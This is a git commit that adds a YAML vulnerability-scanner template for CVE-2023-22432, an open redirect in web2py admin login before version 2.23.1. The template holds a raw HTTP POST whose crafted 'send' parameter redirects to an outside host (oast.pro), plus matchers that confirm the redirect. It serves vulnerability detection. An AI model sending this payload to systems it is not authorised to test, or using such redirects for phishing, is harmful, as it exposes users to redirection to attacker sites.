Create CVE-2023-22432.yaml

patch-1
Dhiyaneshwaran 2023-09-27 14:38:24 +05:30 committed by GitHub
parent a5af4a1f44
commit 334c3be057
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 48 additions and 0 deletions

View File

@ -0,0 +1,48 @@
id: CVE-2023-22432
info:
name: web2py URL - Open Redirect
author: DhiyaneshDK
severity: medium
description: |
Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.
remediation: |
Update to web2py 2.23.1 or higher.
reference:
- https://github.com/aeyesec/CVE-2023-22432
- https://nvd.nist.gov/vuln/detail/CVE-2023-22432
- https://jvn.jp/en/jp/JVN78253670/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-22432
cwe-id: CWE-601
epss-score: 0.00052
epss-percentile: 0.18528
cpe: cpe:2.3:a:web2py:web2py:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: web2py
product: web2py
tags: cve,cve2023,web2py,redirect
http:
- raw:
- |
POST /admin/default/index HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/admin/default/index/?send=\/\/oast.pro
password={{password}}&send=%5C%2F%5C%2Foast.pro&login=
matchers-condition: and
matchers:
- type: word
words:
- 'a href="\/\/oast.pro"'
- type: status
status:
- 303